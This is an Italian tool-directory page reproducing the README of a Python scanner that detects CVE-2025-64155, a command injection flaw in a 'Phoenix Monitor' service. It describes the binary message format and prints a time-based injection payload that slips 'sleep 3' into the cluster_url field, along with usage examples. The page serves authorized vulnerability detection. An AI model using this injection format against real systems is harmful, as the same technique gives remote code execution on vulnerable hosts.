Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-64155-hunter — CVE-2025-64155-hunter | Kitploit
Strumenti/GitHubGitHub/purehate/cve-2025-64155-hunter
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubpurehate/cve-2025-64155-hunter

CVE-2025-64155-hunter

CVE-2025-64155-hunter

Vedi Repository
16 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-64155 Scanner

Uno scanner Python per rilevare la vulnerabilità di command injection (CVE-2025-64155) nel servizio Phoenix Monitor.

Descrizione

CVE-2025-64155 è una vulnerabilità di command injection nel servizio Phoenix Monitor che consente l'esecuzione remota di codice tramite il parametro cluster_url nel comando handleStorageRequest (ID comando: 1075724911).

La vulnerabilità si verifica quando l'input controllato dall'utente nel campo cluster_url viene passato a un comando shell senza una corretta sanitizzazione, consentendo l'iniezione di comandi tramite metacaratteri della shell.

Questo scanner si basa sulla ricerca dell'exploit di Horizon3AI.

Caratteristiche

  • Rilevamento basato sul tempo: utilizza un metodo di rilevamento basato sul tempo sicuro e non distruttivo
  • Supporto SSL/TLS: gestisce connessioni SSL con bypass della validazione del certificato
  • Modalità verbose: output dettagliato per il debug
  • Controllo del servizio: opzione per verificare se il servizio è accessibile senza testare la vulnerabilità

Requisiti

  • Python 3.6+
  • Solo libreria standard (nessuna dipendenza esterna)

Utilizzo

Scansione di Base

root@kitploit:~
python3 scanner.py -t <target_ip>

Opzioni Avanzate

root@kitploit:~
# Specifica una porta personalizzata
python3 scanner.py -t 192.168.1.100 -p 7900

# Abilita l'output verbose
python3 scanner.py -t 192.168.1.100 -v

# Imposta un timeout personalizzato
python3 scanner.py -t 192.168.1.100 --timeout 15

# Controlla se il servizio è accessibile (nessun test di vulnerabilità)
python3 scanner.py -t 192.168.1.100 --check-only

Argomenti della Riga di Comando

  • -t, --target: Indirizzo IP o hostname del target (obbligatorio)
  • -p, --port: Porta del servizio Phoenix Monitor (predefinita: 7900)
  • --timeout: Timeout di connessione in secondi (predefinito: 10)
  • -v, --verbose: Abilita l'output verbose
  • --check-only: Controlla solo se il servizio è accessibile

Come Funziona

Lo scanner utilizza un metodo di rilevamento basato sul tempo:

  1. Si connette al servizio Phoenix Monitor via SSL/TLS
  2. Invia un comando handleStorageRequest con un payload malevolo contenente sleep 3 nel campo cluster_url
  3. Misura il tempo di risposta
  4. Se la risposta viene ritardata di ~3 secondi, il target è probabilmente vulnerabile (il comando è stato eseguito)

Questo metodo è sicuro e non distruttivo: non esegue comandi dannosi, solo un innocuo comando sleep a scopo di rilevamento.

Esempio di Output

Target Vulnerabile

root@kitploit:~
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds

============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)

Target Non Vulnerabile

root@kitploit:~
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds

============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable

Dettagli Tecnici

Formato del Messaggio

Lo scanner invia un messaggio binario con la seguente struttura:

root@kitploit:~
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload

Struttura del Payload

Il payload XML contiene una command injection nel campo cluster_url:

root@kitploit:~
<TEST_STORAGE type="elastic">
    <cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
    ...
</TEST_STORAGE>

Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi di ricerca. Utilizza questo strumento solo su sistemi di tua proprietà o per i quali hai esplicito permesso di testare. L'accesso non autorizzato a sistemi informatici è illegale.

Licenza

Licenza MIT - consulta il file LICENSE per i dettagli.

Scarica lo strumento